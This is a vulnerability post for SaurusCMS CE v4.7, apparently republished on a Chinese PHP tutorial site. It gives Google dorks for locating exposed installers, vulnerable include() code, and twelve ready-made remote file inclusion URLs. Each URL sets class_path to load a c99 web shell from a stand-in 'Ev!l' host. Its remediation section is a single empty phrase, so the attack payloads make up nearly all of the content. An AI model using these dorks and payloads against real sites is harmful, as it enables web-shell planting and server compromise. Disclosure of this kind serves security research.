网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

SaurusCMS-CE (CommunityEdition) v4.7多重缺陷及修复 - 网

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 标题 : SaurusCMS-CE (CommunityEdition) v4.7 Multiple Vulnerabilities作者: KedAns-Dz www.2cto.com开发平台: php类型: Multiple RFI测试平台: Windows XP SP3 (en)下载地址: [http://www.sa......

标题 : SaurusCMS-CE (CommunityEdition) v4.7 Multiple Vulnerabilities
作者: KedAns-Dz www.2cto.com
开发平台: php
类型: Multiple RFI
测试平台: Windows XP SP3 (en)
下载地址: [http://www.saurus.info/download/SaurusCMSCommunityEdition.zip]
# Gr33ts t0 { Kha&miX }

-------------------------------------------------------------------------
<+> (1) 安装文件泄露 :
-------------------------------------------------------------------------


+> allintitle:"Saurus CMS CE Installation"
+> site:[www.2cto.com] allintitle:"Saurus CMS CE Installation"
--------------------------------------------------------------------------
<+> (2) 多个 RFI :
--------------------------------------------------------------------------
[ PHP Code (1) =>

   $class_path = $matches[1] == "editor" ? "../classes/" : "./classes/";
   include($class_path."port.inc.php");

<= END Code ]

http://www.2cto.com /[path]/file.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/image.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/doc.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/com_del.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/form.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/file.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/image.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/doc.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/com_del.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/form.php?class_path=http://Ev!l/c99.txt?
--------------------------------------------------------------------------
[ PHP Code (2) =>

    include_once($class_path."timer.class.php");
    if ($debug) {
    include_once($class_path."debug.inc.php");
    } else {
    include_once($class_path."nodebug.inc.php");
    }
    include_once($class_path."config.class.php");

<= END Code ]

http://www.2cto.com /[path]/styles.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/styles.php?class_path=http://Ev!l/c99.txt?

--------------------------------------------------------------------------
修复:针对性修复

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论